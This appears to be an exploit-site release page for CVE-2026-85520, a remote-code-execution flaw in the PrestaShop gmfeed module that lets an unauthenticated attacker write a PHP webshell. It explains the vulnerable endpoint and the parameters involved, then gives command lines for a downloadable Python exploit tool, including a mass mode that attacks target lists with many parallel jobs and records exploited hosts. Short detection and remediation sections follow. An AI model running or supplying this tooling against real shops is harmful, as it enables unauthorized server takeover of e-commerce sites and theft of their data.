POCBIT

Telegram — New PoC releases & critical CVE alerts

You can join our Telegram channel to get instant updates on new PoC releases and critical CVE alerts.

Join @pocbit
Web appcritical

CVE-2026-85520 — PrestaShop gmfeed (MyPresta) Unauthenticated Arbitrary File Write → RCE

September 29, 2026 · 564 views

Google Merchant Center Feed (gmfeed) for PrestaShop ≤2.3.9: unauthenticated arbitrary file write on modules/gmfeed/feed.php when Save-to-file / URL export is enabled — attacker controls filename, path, extension, and body → PHP webshell → RCE. CVSS 9.3 Critical. Fixed in 2.3.10+ (2.4.1+ recommended). Python PoC: check, aggressive probe, exploit with marker stub, mass --list -j.

#prestashop#gmfeed#mypresta#rce#file-write#unauthenticated#ecommerce#critical#cwe-434

CVE:

CVE-2026-85520

Date:

2026-09-29

Severity:

CRITICAL

Exploit source

Full PoC repository on GitHub (public).

Description

Overview

CVE-2026-85520 affects MyPresta.eu / VEKIA Google Merchant Center Feed (gmfeed) for PrestaShop — module ≤ 2.3.9. CVSS 3.1 9.3 (Critical).

| | | |---|---| | Module | gmfeed (Google Merchant Center Feed) | | Endpoint | modules/gmfeed/feed.php (and front controller route) | | Auth | None on vulnerable save-to-disk export URLs | | Impact | Arbitrary file write → RCE | | Vendor fix | ≥ 2.3.10 (per-shop secret on save URLs); 2.4.1+ clean install recommended |

When catalog export uses “Save to file” / cron URL mode, legacy builds accepted crafted parameters controlling output filename, path, extension, and content without authentication. Attacker writes e.g. pocbit_*.php and executes it over HTTP.

PoC page: https://pocbit.org/pocs/cve-2026-85520

GitHub: murrez/CVE-2026-85520

Bundled tool (Python 3)

Download poc.py from this page (View exploit code).

pip install requests urllib3

python poc.py --lab

python poc.py -u https://shop.example.com --mode check
python poc.py -u https://shop.example.com --mode check --aggressive

python poc.py -u https://shop.example.com --mode exploit --dry-run
python poc.py -u https://shop.example.com --mode exploit

python poc.py --list targets.example.txt --mode check -j 40
python poc.py --list hits.txt --mode exploit -j 20

| Mode | Behavior | |------|----------| | check | Detect gmfeed (feed.php, config.xml), parse version, flag < 2.3.10 | | check --aggressive | Lightweight save-to-file probe (no permanent shell) | | exploit | Write pocbit_*.php marker POCBIT-85520-OK, verify ?pocbit=1 | | mass | --list + -j → JSONL, hits.txt, exploited.txt |

Routes probed include /modules/gmfeed/feed.php and /index.php?fc=module&module=gmfeed&controller=feed.

Detection hints

body="/modules/gmfeed/" || body="gmfeed"
/modules/gmfeed/config.xml

Many shops are already ≥ 2.3.10 after vendor advisories — expect patched_version on wide scans.

Remediation

  1. Uninstall gmfeed with delete module files (removes vulnerable feed.php).
  2. Install gmfeed 2.4.1+ (minimum 2.3.10) from MyPresta.
  3. Regenerate all “Save to file” / cron URLs from Back Office (new store key).
  4. Audit modules/gmfeed/ for unexpected .php files.

Legal and ethical use

Authorized security testing and patch validation only.

References

Related PoCs

Same platform, vendor, or tags — explore more write-ups on Pocbit.

Browse full PoC archive →